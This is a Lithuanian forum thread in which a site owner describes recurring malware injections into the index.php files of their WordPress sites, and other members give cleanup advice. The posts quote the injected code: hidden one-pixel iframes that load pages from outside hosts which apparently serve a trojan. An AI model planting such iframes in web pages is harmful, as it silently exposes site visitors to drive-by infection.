Pereiti prie turinio

Wordpress index.php..


Rekomenduojami pranešimai

Sveiki, dažnai kažkoks grybas isirašo į index.php failą aš nesuprantu negi naujausiuose wordpress versijose tokia saugumo spraga, kad pasinaudoje exploitu gali į index.php failą ikišti ką tik nori

 

Va kekviena savaite ką pamatau visuose savo saituose:

 

 

<?php

/**

* Front to the WordPress application. This file doesn't do anything, but loads

* wp-blog-header.php which does and tells WordPress to load the theme.

*

* @package WordPress

*/

 

/**

* Tells WordPress to load the WordPress theme and output it.

*

* @var bool

*/

define('WP_USE_THEMES', true);

 

/** Loads the WordPress Environment and Template */

require('./wp-blog-header.php');

?<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

 

 

 

<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

 

 

dabar žiūrėsiu kas gausis per chmod padariau, kad write negalėtų daryti gal kas susidūre su šituo esate?

Nuoroda į pranešimą
Dalintis kituose puslapiuose
Sveiki, dažnai kažkoks grybas isirašo į index.php failą aš nesuprantu negi naujausiuose wordpress versijose tokia saugumo spraga, kad pasinaudoje exploitu gali į index.php failą ikišti ką tik nori

 

Va kekviena savaite ką pamatau visuose savo saituose:

 

 

<?php

/**

* Front to the WordPress application. This file doesn't do anything, but loads

* wp-blog-header.php which does and tells WordPress to load the theme.

*

* @package WordPress

*/

 

/**

* Tells WordPress to load the WordPress theme and output it.

*

* @var bool

*/

define('WP_USE_THEMES', true);

 

/** Loads the WordPress Environment and Template */

require('./wp-blog-header.php');

?<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

 

 

 

<html><body><iframe src="http://arnold.kz/libraries/kal/index.php?out=1276069380" width="1" height="1" frameborder="0"></iframe></body></html>>

 

 

dabar žiūrėsiu kas gausis per chmod padariau, kad write negalėtų daryti gal kas susidūre su šituo esate?

 

Kartais tuo virusu iš kinijos neužsikrėtei, kur dėlioja ifreimus?

Redagavo insaider
Nuoroda į pranešimą
Dalintis kituose puslapiuose
Pas mane irgi skriptas yra kur foother'io neįmanoma nuimti užrašo niekaip tik spalvą gaunasi pasikeisti. Šiaip gali buti, kad pas tave tas kodas įlenda per kitas saugumo spragas.

 

Base64 koduote kai turėsiu laiko butinai nuimsiu viskas įmanoma.. o ten tai bus matyt dabar gal palikim šita temą ramybeje jei vėl pasikartos žiūrėsim per chmod padariau, kad kad index.php failo negalima būtų rašyti (write)

Redagavo denas
Nuoroda į pranešimą
Dalintis kituose puslapiuose
pirmiausia savo kompa nuo siuksliu isisvalyk, tada pasikeisk visus slaptazodzius.

 

Slaptažodis pagrindinis ir yra labai gerai sudėtas su jokiais bruteforcais ar md5 nenuimsi, reguleriai keičiamas kas puse metu

 

O dėl kompo nu sakau čia linuxai. Matau jau aiškiai čia sprendimo nebus.. Galvoju pasilikti sql duombazes ir iš naujo sudelioti TVS

Redagavo denas
Nuoroda į pranešimą
Dalintis kituose puslapiuose
o tu pasikeisk slaptazodi pirma, dar serve praskanuok visus failus :rolleyes:

 

bandysiu o dar yra toks dalykas, kad pvz php failų antivirusine neskanuoja ir nieko neranda nors ten koks iframe ikištas o yra būdas skanuoti viso saito failus na tiesiog visa ftp nes be PHP / APACHE jie kai neveikia taip ir neranda nieko.

 

Va pvz aš iškeliu index.php failą jame yra iframe trojan kodas antivirusine nieko neranda o kai per www ieinu jis konektinasi prie to iframe ir iškarto web shield išmeta warning..

Redagavo denas
Nuoroda į pranešimą
Dalintis kituose puslapiuose

Viska pasikeičiau, net tvs persiinstaliavau man atrodo naudodamas shella ikiša.

 

va vis tokie atsiranda index failuose

 

<html><body><iframe src="http://zbestfilm.net/media/kal/index.php?out=1276449386" width="1" height="1" frameborder="0"></iframe></body></html>>

 

Skaičiau galima chmod'a nužeminti iki 444 tai padariau..

Redagavo denas
Nuoroda į pranešimą
Dalintis kituose puslapiuose
tu pirma visas savo directorijas perziurek ar ner kokiu failu nenormaliu.

arba geriausia backupa imesk.

 

Čia rimčiau jau viskas pakeista švaru tiesiog man atrodo čia tokie bus

 

http://www.phpfusion-lt.com/informacija-ba...-virusas,i18963

 

Grynai toks pat

 

http://www.delfi.lt/news/economy/ITbussine...php?id=23184420

Redagavo denas
Nuoroda į pranešimą
Dalintis kituose puslapiuose

Prisijunkite prie diskusijos

Jūs galite rašyti dabar, o registruotis vėliau. Jeigu turite paskyrą, prisijunkite dabar, kad rašytumėte iš savo paskyros.

Svečias
Parašykite atsakymą...

×   Įdėta kaip raiškusis tekstas.   Atkurti formatavimą

  Only 75 emoji are allowed.

×   Nuorodos turinys įdėtas automatiškai.   Rodyti kaip įprastą nuorodą

×   Jūsų anksčiau įrašytas turinys buvo atkurtas.   Išvalyti redaktorių

×   You cannot paste images directly. Upload or insert images from URL.

Įkraunama...
  • Dabar naršo   0 narių

    Nei vienas registruotas narys šiuo metu nežiūri šio puslapio.

  • Prisijunk prie bendruomenės dabar!

    Uždarbis.lt nariai domisi verslo, IT ir asmeninio tobulėjimo temomis, kartu sprendžia problemas, dalinasi žiniomis ir idėjomis, sutinka būsimus verslo partnerius ir dalyvauja gyvuose susitikimuose.

    Užsiregistruok dabar ir galėsi:

    ✔️ Dalyvauti diskusijose;

    ✔️ Kurti naujas temas;

    ✔️ Rašyti atsakymus;

    ✔️ Vertinti kitų žmonių pranešimus;

    ✔️ Susisiekti su bet kuriuo nariu asmeniškai;

    ✔️ Naudotis tamsia dizaino versija;

    ir dar daugiau.

    Registracija trunka ~30 sek. ir yra visiškai nemokama.

  • Naujausios temos

  • Karštos temos

×
×
  • Pasirinkite naujai kuriamo turinio tipą...